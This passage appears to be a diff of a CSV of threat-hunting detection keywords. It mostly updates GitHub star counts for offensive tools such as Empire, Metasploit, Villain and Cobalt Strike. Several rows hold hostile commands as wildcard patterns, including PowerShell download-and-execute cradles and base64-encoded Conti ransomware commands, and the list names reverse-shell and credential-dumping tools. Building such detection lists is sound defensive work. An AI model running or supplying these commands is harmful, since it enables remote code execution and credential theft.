control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Powerpreter.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*powerpick.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*PowerPick.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Powerpreter.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*powerpwn.powerdump*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*powerpwn_tests*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*power-pwn-main*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" @@ -14948,10 +15116,10 @@ "*PowerSCCM-master*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*powerseb/PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*powerseb/PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" -"*PowerSharpBinaries*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*PowerSharpPack.ps1*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*PowerSharpPack-master*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*PowerShdll*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","10","1649","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*PowerSharpBinaries*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*PowerSharpPack.ps1*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*PowerSharpPack-master*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*PowerShdll*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -14964,7 +15132,7 @@ "*powershell IEX (New-Object Net.WebClient).DownloadString(*) Get-NetComputer -FullData *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell Invoke-WebRequest http*.bat *","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Powershell LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z" +"*Powershell LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" "*powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #14","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #8","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass ps lsass*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #11","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -14984,49 +15152,49 @@ "*powershell_encode_stager*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell_management_psinject*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*powershell_management_spawn*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*PowerShell_PoC.zip*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerShell_PoC.zip*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*powershell_privesc_bypassuac_eventvwr*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*powershell_privesc_sherlock*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*powershell_reverse_shell.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*powershell_reverse_tcp.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*powershell_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*powershell_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*powershell_reverse_shell.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*powershell_reverse_tcp.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*powershell_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*powershell_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*powershell-admin-download-execute.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*PowershellAgentGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - 